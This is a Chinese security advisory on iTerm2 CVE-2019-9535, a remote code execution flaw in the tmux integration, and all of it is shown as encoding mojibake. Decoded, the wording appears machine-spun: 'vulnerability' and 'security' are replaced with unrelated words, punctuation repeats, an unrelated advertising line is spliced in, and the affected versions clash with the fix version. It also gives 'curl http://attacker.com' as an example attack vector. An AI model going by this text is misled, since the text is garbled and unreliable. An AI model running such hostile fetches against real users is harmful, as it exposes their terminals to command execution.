iTerm2Ô¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-10-10

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2019-9535£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


iTerm2 3.3.5֮ǰµÄËùÓа汾¾ùÊÜÎó²îÓ°Ïì


Îó²î¸ÅÊö


iTerm2 ÊÇÈ«Çò×îÈÈÃŵÄÖÕ¶ËÄ£ÄâÆ÷Ö®Ò»£¬£¬£¬£¬£¬ÊÇ¿ª·¢Ö°Ô±¾­³£Ê¹ÓÃµÄ MacOS Öն˹¤¾ß£¬£¬£¬£¬£¬ÊÇMac ÄÚÖÃÖÕ¶Ë app ×îÓÐÁ¦µÄÈÈÃÅ¿ªÔ´¹¤¾ßÌæ»»Æ·Ö®Ò»£¬£¬£¬£¬£¬±»Ðí¶à¿ª·¢Ö°Ô±³ÆÎª¡°Mac ÖÕ¶ËÀûÆ÷¡±¡£¡£¡£¡£¡£¡£


iTerm2¹Ù·½Ðû²¼ÁËÇå¾²¸üÐÂÐÞ¸´ÁËÒ»¸öÖÁÉÙ±£´æ7ÄêµÄÔ¶³Ì´úÂëÖ´ÐÐÎó²î£¬£¬£¬£¬£¬Õâ¸öÎó²îÔ´×Ô iTerm2 ÖÐµÄ tmux ¼¯ÀÖ³ÉÄÜ¡£¡£¡£¡£¡£¡£Tumx Ó¦ÓóÌÐòÊÇÒ»¿îÖն˶à·¸´ÓÃÆ÷£¬£¬£¬£¬£¬¿ÉÔÊÐí´Óµ¥¸ö×°±¸½¨Éè²¢¿ØÖƶà¸öÖÕ¶Ë¡£¡£¡£¡£¡£¡£


¹¥»÷Õß¿ÉÒÔÔÚÓû§µÄÖն˱¬·¢Êä³ö£¬£¬£¬£¬£¬Ç±ÔڵĹ¥»÷ÏòÁ¿°üÀ¨Í¨¹ý ssh ÅþÁ¬ÖÁ¶ñÒâЧÀÍÆ÷£¬£¬£¬£¬£¬Í¨¹ýcurl »ñÈ¡¶ñÒâÍøÕ¾£¬£¬£¬£¬£¬»òÕßͨ¹ý tail ¨Cf ¸ú×Ù°üÀ¨Ä³Ð©¶ñÒâÄÚÈݵÄÈÕÖ¾Îļþ¡£¡£¡£¡£¡£¡£ÀýÈ磺curl http://attacker.com and tail -f /var/log/apache2/referer_lo¡£¡£¡£¡£¡£¡£ÔÚÐí¶àÇéÐÎÏÂÄܹ»ÔÚÓû§ÅÌËã»úÉÏÖ´ÐÐÏÂÁî¡£¡£¡£¡£¡£¡£


Îó²îÑéÖ¤


ÍâÑóµÄRadially Open SecurityÒѾ­·Å³öÎó²îʹÓÃÀֳɵÄÊÓÆµ£ºhttps://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3¡£¡£¡£¡£¡£¡£Ä£ÄâÊܺ¦Õß»úеÅþÁ¬µ½¶ñÒâ SSH ЧÀÍÆ÷Ö®ºó£¬£¬£¬£¬£¬ÔÚ»úеÉÏÖ´Ðз­¿ªÒ»¸öÅÌËãÆ÷ÏÂÁîµÄPoC ÊÓÆµ¡£¡£¡£¡£¡£¡£


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨



ÐÞ¸´½¨Òé


¹Ù·½ÒѾ­ÍƳöÇå¾²¸üУ¬£¬£¬£¬£¬Çë¸üÐÂÖÁiTerm2µ½3.3.6°æ±¾£ºhttps://iterm2.com/downloads.html¡£¡£¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/